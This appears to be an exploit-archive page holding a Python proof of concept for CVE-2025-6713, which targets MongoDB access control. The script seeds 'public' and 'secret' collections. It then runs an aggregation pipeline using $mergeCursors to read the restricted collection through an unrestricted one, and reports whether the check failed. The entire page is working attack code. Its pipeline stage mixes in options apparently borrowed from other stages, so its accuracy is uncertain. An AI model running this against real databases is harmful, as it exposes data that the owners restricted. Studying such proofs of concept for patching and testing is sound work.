4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2025-6713.py PY
import pymongo, sys
from pymongo.errors import OperationFailure

mconnect = "mongodb://localhost:27017" # update depending on whether auth is used (USE AUTH)
dbname = ""
acollection = ""
rcollection = ""

USERNAME = ""
PASSWORD = ""

def setupTest(db):
    try:
        db[acollection].drop()
        db[rcollection].drop()
        db[acollection].insert_many([
            {"name": "pubthing1", "data": "pub stuff"},
            {"name": "pubthing2", "data": "pub stuff"}
        ])

        db[rcollection].insert_many([
            {"name": "secret", "stuff": "my national insurance number"},
            {"name": "shhhh", "boo": "size of things"}
        ])
        print("test data inserted")
    except Exception as e:
        print(e)
        sys.exit(1)

def checker():
    try:
        client = pymongo.MongoClient(mconnect, username=USERNAME, password=PASSWORD)
        db = client[dbname]

        setupTest(db)

        pipeline = [
            {"$match": {"name": {"$exists": True}}},
            {
                "$mergeCursors": {
                    "from": {
                        "db": dbname,
                        "coll": rcollection
                    },
                    "as": "merged",
                    "whenMatched": "merge",
                    "whenNotMatched": "insert"
                }
            },
            {"$project": {"name": 1, "data": 1, "_id": 0}}
        ]

        print("executing bad aggregation pipeline")
        result = db[acollection].aggregate(pipeline, allowDiskUse=True)

        print("results from aggregation pipeline:")
        for doc in result:
            print(doc)

        client.close()
    except OperationFailure as e:
        print(f"operation failed: {e.details}")
        if "not authorised" in str(e).lower():
            print("poc failed")
        else:
            print("poc mightve succeeded or got another error - check server logs")
    except Exception as e:
        print(f"unexpected error: {e}")
    finally:
        if 'client' in locals():
            client.close()

if __name__ == "__main__":
    if sys.argv[1] == "run":
        checker() # check cli arg just incase code is used within a framework